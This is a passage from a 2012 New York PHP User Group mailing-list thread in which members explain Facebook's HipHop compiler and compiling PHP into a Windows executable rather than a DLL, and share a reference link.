Message-ID: Wed, Feb 29, 2012 at 3:01 PM, Charles Vasquez wrote: > > what is hip hop? When you speak about compiling do you mean creating a > windows dll or something? I am new to this type of speak, not new to php, > but the php community. I practice php for personal purposes. Hi Charles, Hip Hop is a technology developed by Facebook. It basically takes PHP source code and rewrites it as highly optimized C++ code (or maybe just C, I can't remember). It makes the code run faster and scale better for them. But by compiling, I mean creating a Windows executable. A program you can run directly without having to have the language interpreter on your machine. So I could write PHP code, compile it to a Windows executable and distribute that .exe file which people could run directly on their machines without having to have PHP installed. While a DLL is something pretty similar and is compiled, it's not quite the same thing. DLL's are more libraries of functions that programs can use while a program executable is the program itself. That's probably clear as mud, I'm sure. I suck at explaining things. Anthony From jeff at jeffslutz.com Wed Feb 29 16:45:46 2012 From: jeff at jeffslutz.com (Jeff Slutz) Date: Wed, 29 Feb 2012 16:45:46 -0500 Subject: [nycphp-talk] Compiling PHP 5+ In-Reply-To: References:

Message-ID: I've no personal experience with these tools but there are lots of good references here: http://stackoverflow.com/questions/3189100/php-compiler-for-windows -- Jeff Slutz JSLEUTH LLC 3242 44th ST APT 3F Astoria, NY 11103 c. 970.443.9390 jeff at jeffslutz.com On Wed, Feb 29, 2012 at 4:41 PM, Anthony Papillion wrote: > Wed, Feb 29, 2012 at 3:01 PM, Charles Vasquez > wrote: > > > > what is hip hop? When you speak about compiling do you mean creating a > > windows dll or something? I am new to this type of speak, not new to php, > > but the php community. I practice php for personal purposes. > > Hi Charles, > > Hip Hop is a technology developed by Facebook. It basically takes PHP > source code and rewrites it as highly optimized C++ code (or maybe > just C, I can't remember). It makes the code run faster and scale > better for them. > > But by compiling, I mean creating a Windows executable. A program you > can run directly without having to have the language interpreter on > your machine. So I could write PHP code, compile it to a Windows > executable and distribute that .exe file which people could run > directly on their machines without having to have PHP installed. While > a DLL is something pretty similar and is compiled, it's not quite the > same thing. DLL's are more libraries of functions that programs can > use while a program executable is the program itself. > > That's probably clear as mud, I'm sure. I suck at explaining things. > > Anthony > _______________________________________________ > New York PHP User Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/show-participation > -------------- next part -------------- An HTML attachment was scrubbed... URL: From cvasquez39 at gmail.com Wed Feb 29 17:07:22 2012 From: cvasquez39 at gmail.com (Charles Vasquez) Date: Wed, 29 Feb 2012 17:07:22 -0500 Subject: [nycphp-talk] Compiling PHP 5+ In-Reply-To: References:

Message-ID: Thanks you for sharing the knowledge! Best, Charles On Wed, Feb 29, 2012 at 4:45 PM, Jeff Slutz wrote: > I've no personal experience with these tools but there are lots of good > references here: > http://stackoverflow.com/questions/3189100/php-compiler-for-windows > > > -- > Jeff Slutz > JSLEUTH LLC > 3242 44th ST APT 3F > Astoria, NY 11103 > c. 970.443.9390 > jeff at jeffslutz.com > > > On Wed, Feb 29, 2012 at 4:41 PM, Anthony Papillion wrote: > >> Wed, Feb 29, 2012 at 3:01 PM, Charles Vasquez >> wrote: >> > >> > what is hip hop? When you speak about compiling do you mean creating a >> > windows dll or something? I am new to this type of speak, not new to >> php, >> > but the php community. I practice php for personal purposes. >> >> Hi Charles, >> >> Hip Hop is a technology developed by Facebook. It basically takes PHP >> source code and rewrites it as highly optimized C++ code (or maybe >> just C, I can't remember). It makes the code run faster and scale >> better for them. >> >> But by compiling, I mean creating a Windows executable. A program you >> can run directly without having to have the language interpreter on >> your machine. So I could write PHP code, compile it to a Windows >> executable and distribute that .exe file which people could run >> directly on their machines without having to have PHP installed. While >> a DLL is something pretty similar and is compiled, it's not quite the >> same thing. DLL's are more libraries of functions that programs can >> use while a program executable is the program itself. >> >> That's probably clear as mud, I'm sure. I suck at explaining things. >> >> Anthony >> _______________________________________________ >> New York PHP User Group Community Talk Mailing List >> http://lists.nyphp.org/mailman/listinfo/talk >> >> http://www.nyphp.org/show-participation >> > > > _______________________________________________ > New York PHP User Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/show-participation > -------------- next part -------------- An HTML attachment was scrubbed... URL: